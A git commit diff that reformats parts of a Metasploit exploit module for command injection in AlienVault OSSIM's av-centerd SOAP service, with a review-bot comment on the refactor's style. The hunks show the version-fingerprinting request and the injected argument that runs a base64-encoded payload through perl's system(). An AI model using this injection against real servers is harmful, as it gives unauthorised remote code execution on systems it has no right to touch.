Land jvazquez-r7/metasploit#15, @kernelsmith's module cleanup

bug/bundler_fix
jvazquez-r7 2014-06-17 23:40:46 -05:00
commit 8cae8d545e
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 16 additions and 9 deletions


@ -16,11 +16,11 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info, super(update_info(info,
'Name' => 'AlienVault OSSIM av-centerd Command Injection', 'Name' => 'AlienVault OSSIM av-centerd Command Injection',
'Description' => %q{ 'Description' => %q{
This module exploits a code execution flaw in AlienVault 4.6.1 and prior. This module exploits a code execution flaw in AlienVault 4.6.1 and
The vulnerability exists in the av-centerd SOAP web service, where the prior. The vulnerability exists in the av-centerd SOAP web service,
update_system_info_debian_package method uses perl backticks in a insecure where the update_system_info_debian_package method uses perl backticks
way, allowing command injection. This module has been tested successfully in an insecure way, allowing command injection. This module has been
on AlienVault 4.6.0. tested successfully on AlienVault 4.6.0.
}, },
'Author' => 'Author' =>
[ [
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
'Payload' => 'Payload' =>
{ {
#'BadChars' => "[;`$<>|]", # Don't apply because of the perl stub applied #'BadChars' => "[;`$<>|]", # Don't apply bcuz of the perl stub applied
'Compat' => { 'Compat' => {
'RequiredCmd' => 'perl netcat-e openssl python gawk' 'RequiredCmd' => 'perl netcat-e openssl python gawk'
} }
@ -66,7 +66,12 @@ class Metasploit3 < Msf::Exploit::Remote
version = "" version = ""
res = send_soap_request("get_dpkg") res = send_soap_request("get_dpkg")
if res && res.code == 200 && res.headers['SOAPServer'] && res.headers['SOAPServer'] =~ /SOAP::Lite/ && res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/ if res &&
res.code == 200 &&
res.headers['SOAPServer'] &&
res.headers['SOAPServer'] =~ /SOAP::Lite/ &&
res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/
version = $1 version = $1
end end
@ -107,8 +112,10 @@ class Metasploit3 < Msf::Exploit::Remote
if method == "update_system_info_debian_package" if method == "update_system_info_debian_package"
args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'}) args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'})
perl_payload = "system(decode_base64(\"#{Rex::Text.encode_base64(payload.encoded)}\"))" perl_payload = "system(decode_base64"
args[4].text = "#{rand_text_alpha(4 + rand(4))} && perl -MMIME::Base64 -e '#{perl_payload}'" perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
args[4].text = "#{rand_text_alpha(4 + rand(4))}"
args[4].text += " && perl -MMIME::Base64 -e '#{perl_payload}'"
end end
xml.to_s xml.to_s
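Review bot: In the last hunk the line-length cleanup assigns `args[4].text` and then extends it with `+=`, which reads the value back out of the XML element and writes it a second time; `perl_payload` is likewise split in the middle of a call, which is harder to read than the single interpolation it replaces. Building the argument in a local string and finishing with one `args[4].text = cmd` would keep the lines short without round-tripping through the element. The read-back looks harmless here because the first value is only random letters, but that is inferred from the visible lines. The enclosing method starts before this hunk, so how `args` and `m` are set up cannot be seen.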